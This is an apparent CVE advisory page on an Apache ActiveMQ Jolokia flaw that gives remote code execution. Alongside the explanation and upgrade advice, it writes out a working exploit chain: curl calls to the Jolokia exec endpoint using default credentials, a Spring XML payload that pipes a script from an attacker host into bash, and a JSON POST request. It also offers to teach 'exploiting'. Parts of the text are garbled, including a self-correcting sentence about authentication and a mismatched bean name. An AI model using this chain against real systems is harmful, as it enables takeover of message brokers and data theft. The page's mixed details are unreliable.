Listen to this Post
How the mentioned CVE works:
The Jolokia JMX-HTTP bridge is exposed at `/api/jolokia/` on the ActiveMQ web console. The default access policy permits `exec` operations on all `org.apache.activemq:` MBeans. An authenticated attacker calls `BrokerService.addNetworkConnector(String)` or `addConnector(String)` with a crafted discovery URI. This URI triggers the VM transport’s `brokerConfig` parameter to load a remote Spring XML context via ResourceXmlApplicationContext. Spring then instantiates all singleton beans before the BrokerService validates the configuration. Malicious bean factory methods (e.g., Runtime.exec()) execute arbitrary code on the broker’s JVM. The vulnerability exists because the Jolokia policy does not restrict dangerous MBean operations. No additional authentication bypass is needed – only valid web console credentials. The attack works against default configurations where Jolokia is enabled. Versions before 5.19.4 and 6.0.0 to before 6.2.3 are affected. The fix upgrades the Jolokia access policy and adds validation to the VM transport. This issue is critical as it allows unauthenticated? Actually requires authentication but leads to full RCE. Exploitation is reliable and has been demonstrated in the wild.
dailycve form:
Platform: Apache ActiveMQ
Version: <5.19.4,6.0.0-6.2.3
Vulnerability: Jolokia RCE
Severity: Critical
date: 2024-04-22
Prediction: 2024-05-15
What Undercode Say:
Check Jolokia endpoint exposure curl -k -u admin:admin http://target:8161/api/jolokia/list Enumerate MBeans for BrokerService curl -k -u admin:admin http://target:8161/api/jolokia/exec/org.apache.activemq:type=BrokerService,brokerName=localhost/addNetworkConnector/string:'vm://malicious?brokerConfig=http://evil/spring.xml' Malicious spring.xml payload cat > spring.xml <<EOF <beans xmlns="http://www.springframework.org/schema/beans"> <bean class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg><value>curl http://attacker/shell.sh|bash</value></constructor-arg> </bean> </beans> EOF python3 -m http.server 80
Exploit:
Authenticated attacker sends POST to `/api/jolokia/` with JSON: {"type":"exec","mbean":"org.apache.activemq:type=BrokerService,brokerName=localhost","operation":"addNetworkConnector(java.lang.String)","arguments":["vm://pwn?brokerConfig=http://attacker/spring.xml"]}. Spring loads XML, `ProcessBean` runs command. Reverse shell or malware download.
Protection from this CVE:
Upgrade to 5.19.4 or 6.2.3. If unable, restrict Jolokia access: set `org.apache.activemq.broker.jmx.useJolokia=false` or add firewall rules to block /api/jolokia/. Use strong authentication and network segmentation. Disable unused MBean operations via custom Jolokia access policy.
Impact:
Full remote code execution on the ActiveMQ host. Compromise of message broker, data exfiltration, lateral movement, and denial of service. Critical risk to infrastructure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
